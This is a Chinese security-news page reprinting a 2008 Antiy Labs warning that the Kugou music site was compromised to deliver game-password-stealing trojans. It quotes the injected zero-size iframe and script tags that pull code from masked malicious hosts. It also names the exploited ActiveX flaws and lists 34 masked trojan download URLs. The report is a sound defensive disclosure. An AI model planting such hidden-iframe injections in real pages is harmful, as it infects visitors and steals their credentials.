信息安全资讯首页 | 预警 | 病毒 | 漏洞 | 文摘 | 其它 | 网站 | 分类 | 专题 | 留言本 | 投稿 | 搜索
当前位置:信息安全资讯首页 >> 网站 >> 酷狗网遭遇黑客入侵 用户小心病毒暗流

酷狗网遭遇黑客入侵 用户小心病毒暗流

2008-04-23 08:47:06  作者:  来源:安天实验室  浏览次数:245  文字大小:【】【】【

出处:安天病毒分析组 2008-04-16 12:15

内容:
 

  4月16日,安天实验室发现,酷狗网(http://www.kugoo.com/home/)被黑客植入病毒,但挂马时间不定,最长时间达10分钟用户,如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
  该网站问题代码:

 

  src="http://ring.ku***.com/cairing/BuildJs/HomePH.aspx"
  http://ring.ku***.com/cairing/BuildJs/HomePH.aspx
  问题框架代码:

  

  <iframe src=http://s12.bm***.com/tmp.htm width=0 height=0>
  </iframe>
  http://s12.bm***.com/tmp.htm
  问题框架代码:

  

  <script language="javascript" src="count.js"></script>
  http://s12.bm***.com/count.js
  问题框架代码:
 
 

  <iframe src=test.htm width=0 height=0></iframe>
  http://s12.bm***.com/test.htm
  问题框架代码:

 

  <iframe src=http://xxx3.uu****.net/q66.html width=100 height=0>
  </iframe>
  http://xxx3.uu***.net/q66.html
  问题框架代码:

 

  http://xxx3.uu****.net/news1.html网马代码:

  
  该加密网马解密后可知利用以下漏洞来传播:
  MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
  暴风影音播放器MPS.StormPlayer漏洞
  RealPlayer播放器IERPCtl.IERPCtl.1漏洞
  迅雷漏洞
  百度搜霸漏洞
  联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

  当用户运行酷狗2007或访问酷狗网(http://www.kugoo.com/home/)时,
  系统会自动下载以下病毒文件:

  http://aa1.us***.com/down/1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.zso)

  http://aa1.us***.com/down/2.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.zso)

  http://aa1.us***.com/down/3.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafp)

  http://aa1.us***.com/down/4.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaf)

  http://aa1.us***.com/down/5.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.zjk)

  http://aa1.us***.com/down/6.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.anv)

  http://aa1.us***.com/down/7.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.anv)

  http://aa1.us***.com/down/8.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aadu)

  http://aa1.us***.com/down/9.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.zso)

  http://aa1.us***.com/down/10.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)

  http://aa2.us***.com/down/11.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aadz)

  http://aa2.us***.com/down/12.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafo)

  http://aa2.us***.com/down/13.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)

  http://aa2.us***.com/down/14.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)

  http://aa2.us***.com/down/15.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)

  http://aa2.us***.com/down/16.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)

  http://aa2.us***.com/down/17.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaig)

  http://aa2.us***.com/down/18.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)

  http://aa2.us***.com/down/19.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)

  http://aa2.us***.com/down/20.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)

  http://aa3.us***.com/down/21.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)

  http://aa3.us***.com/down/22.exe
  病毒名:(Trojan-Downloader.Win32.Tiny.anv)

  http://aa3.us***.com/down/23.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)

  http://aa3.us***.com/down/24.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)

  http://aa3.us***.com/down/25.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)

  http://aa3.us***.com/down/26.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aaes)

  http://aa3.us***.com/down/27.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)

  http://aa3.us***.com/down/28.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aasp)

  http://aa3.us***.com/down/29.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.zvr)

  http://aa3.us***.com/down/30.exe
  病毒名:(Trojan-Downloader.Win32.Tiny.anv)

  http://aa3.us***.com/down/31.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.yip)

  http://aa3.us***.com/down/32.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafg)

  http://aa3.us***.com/down/33.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)

  http://aa3.us***.com/down/34.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)

  以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,
盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。

责任编辑:gxis_admin

本文引用地址: http://www.gxis.org/information/2008/0423/article_385.html

相关文章
  

最新文章

更多

· 工信部:关于计算机预装...
· 工信部:近日断网祸起暴...
· 利用搜索引擎实施钓鱼攻...
· 整治互联网低俗之风行动...
· 惩处网络“黑客”有法可依
· 美国航空管理局服务器遭...
· 三鹿网站被黑 黑客聊天...
· 四起网络诈骗手法 三案例...
· Web2.0安全隐患 合法网站...
· 站点卫士落户广州:九家...

推荐文章

更多

· 工信部:关于计算机预装...
· 工信部:近日断网祸起暴...
· 利用搜索引擎实施钓鱼攻...
· 整治互联网低俗之风行动...
· 惩处网络“黑客”有法可依
· 美国航空管理局服务器遭...
· 三鹿网站被黑 黑客聊天...
· 四起网络诈骗手法 三案例...
· Web2.0安全隐患 合法网站...
· 站点卫士落户广州:九家...

热点文章

更多

友情链接

更多 >>
广西信息网络安全报警网站 南宁市公安局网络警察支队 广西壮族自治区民政厅 国家计算机病毒应急处理中心 广西金普威科技有限责任公司
蓝盾信息安全技术股份有限公司 珠海捷郎菱网络科技有限公司 中国互联安全网 广西顶佳计算机信息有限公司 全国信息网络安全协会联盟
数谷网
桂ICP备05007911号